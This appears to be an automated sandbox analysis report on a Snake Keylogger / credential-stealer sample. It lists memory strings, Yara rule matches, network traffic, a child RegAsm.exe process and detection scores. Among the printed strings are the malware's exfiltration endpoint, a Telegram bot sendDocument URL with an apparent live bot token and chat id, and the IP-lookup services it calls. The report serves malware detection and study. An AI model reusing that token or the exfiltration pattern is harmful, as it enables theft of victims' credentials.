Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 0_2_00CAE084	0_2_00CAE084
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 0_2_04FA0130	0_2_04FA0130
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 0_2_04FA0120	0_2_04FA0120
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 0_2_0507A6A0	0_2_0507A6A0
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 0_2_05078358	0_2_05078358
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 0_2_05078E58	0_2_05078E58
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 0_2_0507C8F0	0_2_0507C8F0
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 0_2_0507A691	0_2_0507A691
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 0_2_05078348	0_2_05078348
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 0_2_06C51648	0_2_06C51648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A4C168	3_2_02A4C168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A4CAB0	3_2_02A4CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A47E68	3_2_02A47E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A44F08	3_2_02A44F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A42DD1	3_2_02A42DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A4CAAF	3_2_02A4CAAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A4B9E0	3_2_02A4B9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A4B9DC	3_2_02A4B9DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A44EF8	3_2_02A44EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A47E67	3_2_02A47E67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D4500	3_2_050D4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D15F8	3_2_050D15F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D1C58	3_2_050D1C58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D7770	3_2_050D7770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D6998	3_2_050D6998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DC522	3_2_050DC522
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D0D39	3_2_050D0D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DC530	3_2_050DC530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D0D48	3_2_050D0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DED70	3_2_050DED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DED80	3_2_050DED80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DCDD2	3_2_050DCDD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D15EA	3_2_050D15EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DCDE0	3_2_050DCDE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DDC12	3_2_050DDC12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D1C29	3_2_050D1C29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DDC20	3_2_050DDC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D3C41	3_2_050D3C41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D3C50	3_2_050D3C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DBC71	3_2_050DBC71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D0489	3_2_050D0489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DBC80	3_2_050DBC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D0498	3_2_050D0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D9C90	3_2_050D9C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DE4C0	3_2_050DE4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DE4D0	3_2_050DE4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D2F38	3_2_050D2F38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D2F48	3_2_050D2F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DAF68	3_2_050DAF68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DAF78	3_2_050DAF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D37E8	3_2_050D37E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D37F8	3_2_050D37F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D9E18	3_2_050D9E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DF620	3_2_050DF620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DF630	3_2_050DF630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DD682	3_2_050DD682
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DD690	3_2_050DD690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DA6B9	3_2_050DA6B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DA6C8	3_2_050DA6C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DE91E	3_2_050DE91E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DE928	3_2_050DE928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DC97A	3_2_050DC97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D118F	3_2_050D118F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DC988	3_2_050DC988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D11A0	3_2_050D11A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DF1C8	3_2_050DF1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DF1D8	3_2_050DF1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D0006	3_2_050D0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DB818	3_2_050DB818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DB828	3_2_050DB828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D0040	3_2_050D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DE068	3_2_050DE068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DE078	3_2_050DE078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D4098	3_2_050D4098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D40A8	3_2_050D40A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DC0CA	3_2_050DC0CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D08DF	3_2_050D08DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DC0D8	3_2_050DC0D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D08F0	3_2_050D08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DAB10	3_2_050DAB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DAB20	3_2_050DAB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D3392	3_2_050D3392
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D33A0	3_2_050D33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DB3C1	3_2_050DB3C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DB3D0	3_2_050DB3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DD22A	3_2_050DD22A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DD238	3_2_050DD238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DA261	3_2_050DA261
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DFA78	3_2_050DFA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DA270	3_2_050DA270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050DFA88	3_2_050DFA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D2AE0	3_2_050D2AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_050D2AF0	3_2_050D2AF0

Source: z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVebinace.dll2 vs z87sammylastborn.exe
Source: z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs z87sammylastborn.exe
Source: z87sammylastborn.exe, 00000000.00000002.2084385512.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePoses.dll, vs z87sammylastborn.exe
Source: z87sammylastborn.exe, 00000000.00000002.2084385512.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs z87sammylastborn.exe
Source: z87sammylastborn.exe, 00000000.00000000.2074618731.0000000000602000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNone.exe* vs z87sammylastborn.exe
Source: z87sammylastborn.exe, 00000000.00000002.2084385512.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePoses.dll, vs z87sammylastborn.exe
Source: z87sammylastborn.exe, 00000000.00000002.2082290004.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs z87sammylastborn.exe
Source: z87sammylastborn.exe	Binary or memory string: OriginalFilenameNone.exe* vs z87sammylastborn.exe

Source: z87sammylastborn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3

Source: C:\Users\user\Desktop\z87sammylastborn.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z87sammylastborn.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Mutant created: NULL

Source: z87sammylastborn.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: z87sammylastborn.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\z87sammylastborn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.4534915340.0000000003B1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: z87sammylastborn.exe	Virustotal: Detection: 50%
Source: z87sammylastborn.exe	ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Users\user\Desktop\z87sammylastborn.exe "C:\Users\user\Desktop\z87sammylastborn.exe"
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: wldp.dll	Jump to behavior
